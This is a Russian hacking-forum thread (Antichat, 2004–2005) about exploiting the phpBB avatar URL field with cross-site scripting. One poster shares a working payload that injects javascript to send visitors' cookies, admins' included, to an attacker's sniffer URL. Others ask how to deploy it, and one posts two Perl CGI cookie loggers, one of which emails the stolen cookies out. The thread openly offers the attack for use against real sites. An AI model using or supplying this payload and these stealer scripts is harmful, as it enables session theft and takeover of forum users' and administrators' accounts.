ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
Перезагрузить страницу XSS в phpBB
   
Ответ
Страница 1 из 4 1 2 3 4 >
 
Опции темы Поиск в этой теме Опции просмотра

XSS в phpBB
  #1  
Старый 27.12.2004, 10:58
Аватар для zFlex
zFlex
Новичок
Регистрация: 26.12.2004
Сообщений: 5
Провел на форуме:
0

Репутация: 0
Отправить сообщение для zFlex с помощью ICQ
По умолчанию XSS в phpBB
йопт!! запарился уже... мож потому и не могу решить проблему, что она слишком легкая
Короче так, на форуме phpBB есть возможность вставлять аватар со своего url , решил проверить на дырочку, и вписал туда javascript:alert();
в ответ получил:
<img src="javascript:alert();" alt="" border="0" />
идем дальше...
решил проверить на окончание *.jpg , вписав x.jpg и получил:
<img src="x.jpg" alt="" border="0" />
затем проверил вписав x.ru x=`x.jpg получил:
<img src="x.ru x=`x.jpg" alt="" border="0" />
и т.п.
Вопрос вот в чем: пишу вместо картинки снифер (http://antichat.ru/cgi-bin/s.jpg) и он прекрасно его ловит, однаком не нужны куки всех, у кого грузится страница с моим аватором, все перепробовал, но нифига не получается Помогите плзз...
 
Ответить с цитированием

  #2  
Старый 28.12.2004, 00:21
Аватар для Algol
Algol
Регистрация: 29.05.2002
Сообщений: 1,793
Провел на форуме:
2050916

Репутация: 0


По умолчанию
Приведи код, который ты вставляешь в форум.
 
Ответить с цитированием

  #3  
Старый 28.12.2004, 08:16
Аватар для zFlex
zFlex
Новичок
Регистрация: 26.12.2004
Сообщений: 5
Провел на форуме:
0

Репутация: 0
Отправить сообщение для zFlex с помощью ICQ
По умолчанию
поэтому и спрашиваю, как код оформить?? Дело в том, что форум съедает любые варианты, т.е. что бы не писалось в поле ссылки на аватар - все будет отображаться как картинка, например:
пишем в поле bla-bla-bla
получится <img src="bla-bla-bla" alt="" border="0" />
пишем javascript:alert(document.cookie)
и при загрузки страницы нам открывается alert окно в котором наши куки, а в html-тегах видим <img src="javascript:alert(document.cookie)" alt="" border="0" />
Словом, все, что бы Мы не писали в графе аватара, форум будет съедать как картинку <img src="наш текст">
Вот Я и спрашиваю, как мне вместо отображения document.cookie у юзера отдать запрос сниферу, что бы он их словил, а у юзера ни чего не отображалось?? Многое пререпробовал, но результат один и тот же - снифер ловит opener.location (url на котором находится юзер), то бишь адрес, откуда был вызван снифер, а не document.cookie - его куки...
Потенциальная дырка есть, но ее нужно оформить!! Есть идеи?!
 
Ответить с цитированием

  #4  
Старый 29.12.2004, 11:34
Аватар для zFlex
zFlex
Новичок
Регистрация: 26.12.2004
Сообщений: 5
Провел на форуме:
0

Репутация: 0
Отправить сообщение для zFlex с помощью ICQ
Lightbulb
Ура-а-а-а-а-а!!!!!! Решение найдено!!
Последний раз редактировалось zFlex; 13.01.2005 в 23:46..
 
Ответить с цитированием

  #5  
Старый 30.12.2004, 08:24
Аватар для zFlex
zFlex
Новичок
Регистрация: 26.12.2004
Сообщений: 5
Провел на форуме:
0

Репутация: 0
Отправить сообщение для zFlex с помощью ICQ
Lightbulb
Короче так...
Есть в phpBB такая хреновина, как аватар и там нет фильтра на спец символы, а это нам позволяет делать все, что вздумается Инфы об этом XSS ни где не встречал, поэтому можно считать новой

XSS такой:
http://[target].jpg" style="background:url(javascript:document.images[0].src=/http:xxlocalhostx1.php?/.source.replace(/x/g,String.fromCharCode(47))+document.cookie)
где [target] - url на реальную картинку
localhost - url снифера

В ответ от сервера получаем в html-тегах:
<img src="http://[target].jpg" style="background:url(javascript:document.images[0].src=/http:xxlocalhostx1.php?/.source.replace(/x/g,String.fromCharCode(47))+document.cookie)" alt="" border="0" />

таким образом грузится картинка, не доставляющая жертве (ею может быть админ) ни каких неудобств, в то время как его куки уходят к сниферу

з.ы. кто первый - тот и пускай пишет ролик для видео.античат.ру , тока просьба указать, что эту ни кому не приметную багу нашел zFlex.
С ув., Йа ))
 
Ответить с цитированием

  #6  
Старый 13.01.2005, 00:17
Аватар для alien51
alien51
Новичок
Регистрация: 13.01.2005
Сообщений: 4
Провел на форуме:
0

Репутация: 0
По умолчанию
Мля мля неработает ...
Цитата:
http://[target].jpg" style="background:url(javascript:document.images[0].src=/http:xxlocalhostx1.php?/.source.replace(/x/g,String.fromCharCode(47))+document.cookie)
Как именно вставить в сообщение на форуме эту штуку ??
 
Ответить с цитированием

  #7  
Старый 13.01.2005, 00:41
Аватар для >>ElvI$<<
>>ElvI$<<
Познающий
Регистрация: 12.01.2005
Сообщений: 42
Провел на форуме:
36241

Репутация: 1
Отправить сообщение для >>ElvI$<< с помощью ICQ
По умолчанию
Блин,ты че глупый,какой нафиг сообщение в форуме...это вставляется в АФАТАР!!!т.е. когда регаешься или редактируешь свой акк,там пишешь,где url: http://[target].jpg" style="background:url(javascript:document.images[0].src=/http:xxlocalhostx1.php?/.source.replace(/x/g,String.fromCharCode(47))+document.cookie)?


P.s.: я могу написать видео...
 
Ответить с цитированием

  #8  
Старый 13.01.2005, 01:15
Аватар для >>ElvI$<<
>>ElvI$<<
Познающий
Регистрация: 12.01.2005
Сообщений: 42
Провел на форуме:
36241

Репутация: 1
Отправить сообщение для >>ElvI$<< с помощью ICQ
По умолчанию
Обломчик,на большенстве серверов стоит блок 8)
 
Ответить с цитированием

  #9  
Старый 13.01.2005, 02:02
Аватар для alien51
alien51
Новичок
Регистрация: 13.01.2005
Сообщений: 4
Провел на форуме:
0

Репутация: 0
Arrow
Цитата:
Сообщение от >>ElvI$<<  
Блин,ты че глупый,какой нафиг сообщение в форуме...это вставляется в АФАТАР!!!т.е. когда регаешься или редактируешь свой акк,там пишешь,где url: http://[target].jpg" style="background:url(javascript:document.images[0].src=/http:xxlocalhostx1.php?/.source.replace(/x/g,String.fromCharCode(47))+document.cookie)?
А где скрипт взять, который записывал бы их в отдельное файло ? У меня есть но они неканают или я чё то неправельно делаю....
Цитата:
#!/usr/bin/perl -w
#
open cOOKIES,"cookies.txt";
print "Conter-Type:text/html\n\n\";
#
#
print COOKIES "-------------new cookie----------\n";
#
#
#
print COOKIES "$ENV{'QERY_STRING'}\n';
#
print COOKIES "---------end of cookie------------"\n\n";
#
close COOKIES;
и ещё

Цитата:
#!/usr/bin/perl
use CGI qw(:standard);
$cookie=$ENV{QUERY_STRING};
$file="cookies.txt"; //???? ??????????? ????
open FILE, ">>$file";
print FILE "$cookie\n\n";
close FILE;
$query = CGI::new();
print $query->redirect('http://www.musthave.ru');
$mailprog = '/usr/sbin/sendmail';
$mail='xaker@xaker.ru'; //??? ???????? ???? ???? ? ????????? ??? ???????
$target='pass@admina.net';
open MAIL, "|mailprog -t";
print MAIL "Content-Type: text/plain\n";
print MAIL "Subject: new cookies\n";
print MAIL "To: $mail\n";
print MAIL "From: .$target\n\n";
print MAIL "$cookie";
close MAIL;
Дак вот как привельно составить эту строчку и почему у меня это дело всё неработает ... ваще Шляпа какая то :|
 
Ответить с цитированием

  #10  
Старый 13.01.2005, 21:35
Аватар для alien51
alien51
Новичок
Регистрация: 13.01.2005
Сообщений: 4
Провел на форуме:
0

Репутация: 0
По умолчанию
Парни помогите или дайте ссылку на мануал ..... нужно ... или оправте скрипт и ссылку на мыло alien51@yandex.ru заранее спасибо.
 
Ответить с цитированием
Ответ
Страница 1 из 4 1 2 3 4 >



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ